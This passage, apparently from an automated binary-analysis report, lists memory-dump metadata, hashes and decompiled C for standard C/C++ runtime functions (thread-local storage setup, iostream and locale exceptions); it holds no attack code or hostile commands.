0x0086a7fb
0x0086a7fb
0x0086a7fd
0x0086a802
0x00000000
0x00000000
0x0086a804
0x0086a807
0x00000000
0x0086a809
0x0086a80f
0x00000000
0x00000000
0x00000000
0x00000000
0x0086a80f
0x00000000
0x0086a807
0x0086a876
0x0086a876
0x0086a87a
0x0086a87a
0x0086a7f9
0x00000000

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 402fca3f172775c74beeaadb1dd001674ec46379e368776469b65c4565fe732f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 291131B760004243D60C867DD4B85BBA7D5FBC932172F4379D142EB758D222D947DD02

Uniqueness

Uniqueness Score: -1.00%

Function 00888524, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4055d925c376e0ed82dd58ad7afe26f3ff273b82d10e142d14ab059e1f986786
Instruction ID: 7ea5f8ffc25a01aa76cfbd7aae9f209dd98ac75d855752c7f44f0d8c1a7e9ec8
Opcode Fuzzy Hash: 4055d925c376e0ed82dd58ad7afe26f3ff273b82d10e142d14ab059e1f986786
Instruction Fuzzy Hash: 8DE0E5362A4909EFCA44DBACCC85D65B3E8EB19720B544690F929C72A1EA24EE009A51

Uniqueness

Uniqueness Score: -1.00%

Function 00888561, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction ID: 433539a347a1a065651120562af21dfd4fed87ed6028815f9a3e761c5eec9716
Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction Fuzzy Hash: FCE04F32620514DBC771BB59D804C93F7E8FF987B07894826E959D7A21D630FC10C790

Uniqueness

Uniqueness Score: -1.00%

Function 00887A30, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: 29e05869195d59a65b0b59a0709a17e463a066ea9bb765d5af4c2546d4ee06b9
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: F1B092606264904AEB1687248415B0576F0A740B01F8984E0A005C2881C69DCE849200

Uniqueness

Uniqueness Score: -1.00%

Function 008885C4, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00870D9B, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00870D9B(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t35;
				struct HINSTANCE__* _t36;
				intOrPtr* _t37;
				void* _t40;
				intOrPtr* _t42;
				void* _t43;

				_t35 = __edx;
				_t30 = __ebx;
				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t36 != 0) {
					 *0x888b5c = GetProcAddress(_t36, "FlsAlloc");
					 *0x888b60 = GetProcAddress(_t36, "FlsGetValue");
					 *0x888b64 = GetProcAddress(_t36, "FlsSetValue");
					_t7 = GetProcAddress(_t36, "FlsFree");
					__eflags =  *0x888b5c;
					_t40 = TlsSetValue;
					 *0x888b68 = _t7;
					if( *0x888b5c == 0) {
						L6:
						 *0x888b60 = TlsGetValue;
						 *0x888b5c = E00870AAB;
						 *0x888b64 = _t40;
						 *0x888b68 = TlsFree;
					} else {
						__eflags =  *0x888b60;
						if( *0x888b60 == 0) {
							goto L6;
						} else {
							__eflags =  *0x888b64;
							if( *0x888b64 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x885bc0 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x888b60);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E0086AA9C();
							_t42 = __imp__EncodePointer;
							_t14 =  *_t42( *0x888b5c);
							 *0x888b5c = _t14;
							_t15 =  *_t42( *0x888b60);
							 *0x888b60 = _t15;
							_t16 =  *_t42( *0x888b64);
							 *0x888b64 = _t16;
							 *0x888b68 =  *_t42( *0x888b68);
							_t18 = E00871018();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00870AE8();
								goto L15;
							} else {
								_t37 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t37()))( *0x888b5c, E00870C6C);
								 *0x885bbc = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E0086EBA2(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t37()))( *0x888b64,  *0x885bbc, _t43);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E00870B25(_t30, _t35, _t37, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00870AE8();
					return 0;
				}
			}

0x00870d9b
0x00870d9b
0x00870da9
0x00870dad
0x00870dcd
0x00870dda
0x00870de7
0x00870dec
0x00870dee
0x00870df5
0x00870dfb
0x00870e00
0x00870e18
0x00870e1d
0x00870e27
0x00870e31
0x00870e37
0x00870e02
0x00870e02
0x00870e09
0x00000000
0x00870e0b
0x00870e0b
0x00870e12
0x00000000
0x00870e14
0x00870e14
0x00870e16
0x00000000
0x00000000
0x00870e16
0x00870e12
0x00870e09
0x00870e3c
0x00870e42
0x00870e47
0x00870e4a
0x00870f11
0x00870f11
0x00870f11
0x00870e50
0x00870e57
0x00870e59
0x00870e5b
0x00000000
0x00870e61
0x00870e61
0x00870e6c
0x00870e72
0x00870e7a
0x00870e7f
0x00870e87
0x00870e8c
0x00870e94
0x00870e9b
0x00870ea0
0x00870ea5
0x00870ea7
0x00870f0c
0x00870f0c
0x00000000
0x00870ea9
0x00870ea9
0x00870ebc
0x00870ebe
0x00870ec3
0x00870ec6
0x00000000
0x00870ec8
0x00870ed4
0x00870ed8
0x00870eda
0x00000000
0x00870edc
0x00870eed
0x00870eef
0x00000000
0x00870ef1
0x00870ef1
0x00870ef3
0x00870ef4
0x00870efb
0x00870f01
0x00870f05
0x00870f09
0x00870f09
0x00870eef
0x00870eda
0x00870ec6
0x00870ea7
0x00870e5b
0x00870f15
0x00870daf
0x00870daf
0x00870db7
0x00870db7

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0086AE65), ref: 00870DA3
__mtterm.LIBCMT ref: 00870DAF

Part of subcall function 00870AE8: DecodePointer.KERNEL32(00000006,00870F11,?,0086AE65), ref: 00870AF9
Part of subcall function 00870AE8: TlsFree.KERNEL32(00000022,00870F11,?,0086AE65), ref: 00870B13
Part of subcall function 00870AE8: DeleteCriticalSection.KERNEL32(00000000,00000000,77E4F3A0,?,00870F11,?,0086AE65), ref: 0087107F
Part of subcall function 00870AE8: _free.LIBCMT ref: 00871082
Part of subcall function 00870AE8: DeleteCriticalSection.KERNEL32(00000022,77E4F3A0,?,00870F11,?,0086AE65), ref: 008710A9

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00870DC5
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00870DD2
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00870DDF
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00870DEC
TlsAlloc.KERNEL32(?,0086AE65), ref: 00870E3C
TlsSetValue.KERNEL32(00000000,?,0086AE65), ref: 00870E57
__init_pointers.LIBCMT ref: 00870E61
EncodePointer.KERNEL32(?,0086AE65), ref: 00870E72
EncodePointer.KERNEL32(?,0086AE65), ref: 00870E7F
EncodePointer.KERNEL32(?,0086AE65), ref: 00870E8C
EncodePointer.KERNEL32(?,0086AE65), ref: 00870E99
DecodePointer.KERNEL32(00870C6C,?,0086AE65), ref: 00870EBA
__calloc_crt.LIBCMT ref: 00870ECF
DecodePointer.KERNEL32(00000000,?,0086AE65), ref: 00870EE9
GetCurrentThreadId.KERNEL32 ref: 00870EFB

Strings

FlsAlloc, xrefs: 00870DBF
KERNEL32.DLL, xrefs: 00870D9E
FlsFree, xrefs: 00870DE1
FlsGetValue, xrefs: 00870DC7
FlsSetValue, xrefs: 00870DD4

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 71fee48102223ca939a984bc2bd9a67f3fd27b1024e1811ea6fd30d9587d177e
Instruction ID: 398b74a4df2d78cd56cd77929328b5f33704470acd5d4b81aa609cfbd2545e66
Opcode Fuzzy Hash: 71fee48102223ca939a984bc2bd9a67f3fd27b1024e1811ea6fd30d9587d177e
Instruction Fuzzy Hash: E3314DB1940715DECB61AF7EAC0950A3FA0FB84330B90892AE518D32B5DF74E841CF55

Uniqueness

Uniqueness Score: -1.00%

Function 008614E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008614E0(void* __ecx, signed int _a4, char _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				char _v24;
				char* _v28;
				signed int _t31;
				intOrPtr _t32;
				intOrPtr _t34;
				intOrPtr _t38;
				signed char _t45;

				_t31 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t31;
				_t45 =  *(__ecx + 0x10) & _t31;
				if(_t45 != 0) {
					if(_a8 != 0) {
						E0086BA71(0, 0);
					}
					if((_t45 & 0x00000004) != 0) {
						_t38 = E008681B6();
						_v28 = "ios_base::badbit set";
						E0086A180( &_v24,  &_v28);
						_t45 =  &_v28;
						_v16 = 1;
						_v12 = _t38;
						_v28 = 0x87f35c;
						E0086BA71(_t45, 0x8838e4);
					}
					if((_t45 & 0x00000002) != 0) {
						_t34 = E008681B6();
						_v28 = "ios_base::failbit set";
						E0086A180( &_v24,  &_v28);
						_v16 = 1;
						_v12 = _t34;
						_v28 = 0x87f35c;
						E0086BA71( &_v28, 0x8838e4);
					}
					_t32 = E008681B6();
					_v28 = "ios_base::eofbit set";
					E0086A180( &_v24,  &_v28);
					_v16 = 1;
					_v12 = _t32;
					_v28 = 0x87f35c;
					_t31 = E0086BA71( &_v28, 0x8838e4);
				}
				return _t31;
			}

0x008614e9
0x008614ef
0x008614f5
0x008614f9
0x00861503
0x00861509
0x00861509
0x00861516
0x00861518
0x00861528
0x00861530
0x0086153a
0x0086153f
0x00861543
0x00861547
0x0086154f
0x0086154f
0x00861557
0x00861559
0x00861569
0x00861571
0x00861580
0x00861584
0x00861588
0x00861590
0x00861590
0x00861595
0x008615a5
0x008615ad
0x008615bc
0x008615c0
0x008615c4
0x008615cc
0x008615cc
0x008615d6

APIs

__CxxThrowException@8.LIBCMT ref: 00861509

Part of subcall function 0086BA71: RaiseException.KERNEL32(?,?,0086ADB1,?,?,?,?,?,0086ADB1,?,00883954,00888B28), ref: 0086BAB3

std::exception::exception.LIBCMT ref: 00861530
__CxxThrowException@8.LIBCMT ref: 0086154F
std::exception::exception.LIBCMT ref: 00861571
__CxxThrowException@8.LIBCMT ref: 00861590
std::exception::exception.LIBCMT ref: 008615AD
__CxxThrowException@8.LIBCMT ref: 008615CC

Strings

ios_base::badbit set, xrefs: 00861528
ios_base::failbit set, xrefs: 00861569
ios_base::eofbit set, xrefs: 008615A5

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4237746311-1866435925
Opcode ID: 0d61107b13b17b8a371be9a30b0e126637631a9b1a1abd94bdac365734fb4469
Instruction ID: c20d3d52c2a9b35f5d0672be4d68f057301aa847f1e1addd43b9cc5615c7ade6
Opcode Fuzzy Hash: 0d61107b13b17b8a371be9a30b0e126637631a9b1a1abd94bdac365734fb4469
Instruction Fuzzy Hash: 5F2181B54083149BC300EF99C405A9AF7E8FFC5714F058A1EF699D7242DB70D6098B67

Uniqueness

Uniqueness Score: -1.00%

Function 00868A33, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00868A33(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E0086BEB0(E0087DF96, __ebx, __edi, __esi);
				E008696AD(_t44 - 0x14, 0);
				_t43 =  *0x888764; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E00861260( *((intOrPtr*)(_t44 + 8)), E00861150(0x888818));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00868928(__ebx, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E0086A1E7(_t44 - 0x20, "bad cast");
							E0086BA71(_t44 - 0x20, 0x88391c);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x888764 =  *((intOrPtr*)(_t44 - 0x10));
						E00861190( *((intOrPtr*)(_t44 - 0x10)));
						E0086922F(__eflags, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E008696D5(_t44 - 0x14);
				return E0086BF4F(_t41);
			}

0x00868a33
0x00868a3a
0x00868a44
0x00868a49
0x00868a4f
0x00868a58
0x00868a64
0x00868a69
0x00868a6d
0x00868a71
0x00868a77
0x00868a7d
0x00868a7e
0x00868a85
0x00868a88
0x00868a92
0x00868aa0
0x00868aa0
0x00868aa5
0x00868aaa
0x00868ab0
0x00868ab6
0x00868a73
0x00868a73
0x00868a73
0x00868a71
0x00868abc
0x00868ac3
0x00868acf

APIs

__EH_prolog3.LIBCMT ref: 00868A3A
std::_Lockit::_Lockit.LIBCPMT ref: 00868A44
int.LIBCPMT ref: 00868A5B

Part of subcall function 00861150: std::_Lockit::_Lockit.LIBCPMT ref: 00861161

messages.LIBCPMT ref: 00868A7E
std::bad_exception::bad_exception.LIBCMT ref: 00868A92
__CxxThrowException@8.LIBCMT ref: 00868AA0
std::locale::facet::_Facet_Register.LIBCPMT ref: 00868AB6

Strings

bad cast, xrefs: 00868A8A

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2525416601-3145022300
Opcode ID: 366d5bbe619f001227de77193c4677d4a8b9d55d49f81eac1900718ab018730c
Instruction ID: ecaad7779bdba3a6d43e5cc0ab0c16da36ea906583454350578a643f372dd65f
Opcode Fuzzy Hash: 366d5bbe619f001227de77193c4677d4a8b9d55d49f81eac1900718ab018730c
Instruction Fuzzy Hash: C1018B319402289BCB05FBA8C912ABE7239FF40720F660209E524EB2E2DF349A019752

Uniqueness

Uniqueness Score: -1.00%

Function 008674B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008674B0(char _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v28;
				void* __edi;
				intOrPtr _t28;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t37;
				void* _t42;
				signed int _t45;
				signed int _t46;
				char _t47;
				signed int _t59;
				intOrPtr _t61;

				E008696AD( &_v16, 0);
				_t47 =  *0x88a714;
				_v8 = _t47;
				if( *0x88a720 == 0) {
					E008696AD( &_v12, 0);
					if( *0x88a720 == 0) {
						_t45 =  *0x8888e4; // 0x1
						_t46 = _t45 + 1;
						 *0x8888e4 = _t46;
						 *0x88a720 = _t46;
					}
					E008696D5( &_v12);
				}
				_t59 =  *0x88a720;
				_t28 =  *_a4;
				if(_t59 >=  *((intOrPtr*)(_t28 + 0xc))) {
					_t61 = 0;
					goto L6;
				} else {
					_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + _t59 * 4));
					if(_t61 != 0) {
						L18:
						E008696D5( &_v16);
						return _t61;
					} else {
						L6:
						if( *((char*)(_t28 + 0x14)) == 0) {
							L9:
							if(_t61 != 0) {
								goto L18;
							} else {
								goto L10;
							}
						} else {
							_t42 = E008692A6();
							if(_t59 >=  *((intOrPtr*)(_t42 + 0xc))) {
								L10:
								if(_t47 == 0) {
									_t32 = E00867AC0(_t58,  &_v8, _a4);
									__eflags = _t32 - 0xffffffff;
									if(_t32 == 0xffffffff) {
										E0086A1E7( &_v28, "bad cast");
										E0086BA71( &_v28, 0x88391c);
									}
									_t61 = _v8;
									 *0x88a714 = _t61;
									E008696AD( &_a4, 0);
									_t34 =  *((intOrPtr*)(_t61 + 4));
									__eflags = _t34 - 0xffffffff;
									if(_t34 < 0xffffffff) {
										_t37 = _t34 + 1;
										__eflags = _t37;
										 *((intOrPtr*)(_t61 + 4)) = _t37;
									}
									E008696D5( &_a4);
									E0086922F(__eflags, _t61);
									goto L18;
								} else {
									E008696D5( &_v16);
									return _t47;
								}
							} else {
								_t58 =  *((intOrPtr*)(_t42 + 8));
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t42 + 8)) + _t59 * 4));
								goto L9;
							}
						}
					}
				}
			}

0x008674be
0x008674ca
0x008674d0
0x008674d3
0x008674da
0x008674e6
0x008674e8
0x008674ed
0x008674ee
0x008674f3
0x008674f3
0x008674fb
0x008674fb
0x00867503
0x00867509
0x0086750e
0x0086754f
0x00000000
0x00867510
0x00867513
0x00867518
0x008675b2
0x008675b5
0x008675c2
0x0086751e
0x0086751e
0x00867522
0x00867534
0x00867536
0x00000000
0x00000000
0x00000000
0x00000000
0x00867524
0x00867524
0x0086752c
0x00867538
0x0086753a
0x0086755a
0x00867562
0x00867565
0x0086756f
0x0086757d
0x0086757d
0x00867582
0x0086758a
0x00867590
0x00867595
0x00867598
0x0086759b
0x0086759d
0x0086759d
0x0086759e
0x0086759e
0x008675a4
0x008675aa
0x00000000
0x0086753c
0x00867541
0x0086754e
0x0086754e
0x0086752e
0x0086752e
0x00867531
0x00000000
0x00867531
0x0086752c
0x00867522
0x00867518

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008674BE
std::_Lockit::_Lockit.LIBCPMT ref: 008674DA
std::bad_exception::bad_exception.LIBCMT ref: 0086756F
__CxxThrowException@8.LIBCMT ref: 0086757D
std::_Lockit::_Lockit.LIBCPMT ref: 00867590
std::locale::facet::_Facet_Register.LIBCPMT ref: 008675AA

Strings

bad cast, xrefs: 00867567

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 3a571a3f4a58d9cf26d1fb245a15250b1dc698ef3838c8005322bf056e3ad082
Instruction ID: 1c5aedbd2f444283f9e5ace58ea25683bd6993a7c84bf947be907703debc0bd2
Opcode Fuzzy Hash: 3a571a3f4a58d9cf26d1fb245a15250b1dc698ef3838c8005322bf056e3ad082
Instruction Fuzzy Hash: 4C31E6319042149BCB14EF5CD845AADB7B8FF10324F4601A6E857E72D1DB30AE41CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 008675D0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008675D0(char _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v28;
				void* __edi;
				intOrPtr _t28;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t37;
				void* _t42;
				signed int _t45;
				signed int _t46;
				char _t47;
				signed int _t59;
				intOrPtr _t61;

				E008696AD( &_v16, 0);
				_t47 =  *0x88a718;
				_v8 = _t47;
				if( *0x88a728 == 0) {
					E008696AD( &_v12, 0);
					if( *0x88a728 == 0) {
						_t45 =  *0x8888e4; // 0x1
						_t46 = _t45 + 1;
						 *0x8888e4 = _t46;
						 *0x88a728 = _t46;
					}
					E008696D5( &_v12);
				}
				_t59 =  *0x88a728;
				_t28 =  *_a4;
				if(_t59 >=  *((intOrPtr*)(_t28 + 0xc))) {
					_t61 = 0;
					goto L6;
				} else {
					_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + _t59 * 4));
					if(_t61 != 0) {
						L18:
						E008696D5( &_v16);
						return _t61;
					} else {
						L6:
						if( *((char*)(_t28 + 0x14)) == 0) {
							L9:
							if(_t61 != 0) {
								goto L18;
							} else {
								goto L10;
							}
						} else {
							_t42 = E008692A6();
							if(_t59 >=  *((intOrPtr*)(_t42 + 0xc))) {
								L10:
								if(_t47 == 0) {
									_t32 = E00867B40(_t58,  &_v8, _a4);
									__eflags = _t32 - 0xffffffff;
									if(_t32 == 0xffffffff) {
										E0086A1E7( &_v28, "bad cast");
										E0086BA71( &_v28, 0x88391c);
									}
									_t61 = _v8;
									 *0x88a718 = _t61;
									E008696AD( &_a4, 0);
									_t34 =  *((intOrPtr*)(_t61 + 4));
									__eflags = _t34 - 0xffffffff;
									if(_t34 < 0xffffffff) {
										_t37 = _t34 + 1;
										__eflags = _t37;
										 *((intOrPtr*)(_t61 + 4)) = _t37;
									}
									E008696D5( &_a4);
									E0086922F(__eflags, _t61);
									goto L18;
								} else {
									E008696D5( &_v16);
									return _t47;
								}
							} else {
								_t58 =  *((intOrPtr*)(_t42 + 8));
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t42 + 8)) + _t59 * 4));
								goto L9;
							}
						}
					}
				}
			}

0x008675de
0x008675ea
0x008675f0
0x008675f3
0x008675fa
0x00867606
0x00867608
0x0086760d
0x0086760e
0x00867613
0x00867613
0x0086761b
0x0086761b
0x00867623
0x00867629
0x0086762e
0x0086766f
0x00000000
0x00867630
0x00867633
0x00867638
0x008676d2
0x008676d5
0x008676e2
0x0086763e
0x0086763e
0x00867642
0x00867654
0x00867656
0x00000000
0x00000000
0x00000000
0x00000000
0x00867644
0x00867644
0x0086764c
0x00867658
0x0086765a
0x0086767a
0x00867682
0x00867685
0x0086768f
0x0086769d
0x0086769d
0x008676a2
0x008676aa
0x008676b0
0x008676b5
0x008676b8
0x008676bb
0x008676bd
0x008676bd
0x008676be
0x008676be
0x008676c4
0x008676ca
0x00000000
0x0086765c
0x00867661
0x0086766e
0x0086766e
0x0086764e
0x0086764e
0x00867651
0x00000000
0x00867651
0x0086764c
0x00867642
0x00867638

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008675DE
std::_Lockit::_Lockit.LIBCPMT ref: 008675FA
std::bad_exception::bad_exception.LIBCMT ref: 0086768F
__CxxThrowException@8.LIBCMT ref: 0086769D
std::_Lockit::_Lockit.LIBCPMT ref: 008676B0
std::locale::facet::_Facet_Register.LIBCPMT ref: 008676CA

Strings

bad cast, xrefs: 00867687

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: d1a596b8e52ac0d2b0f2205af57a38b786808315dc1853f7977f804850a202d3
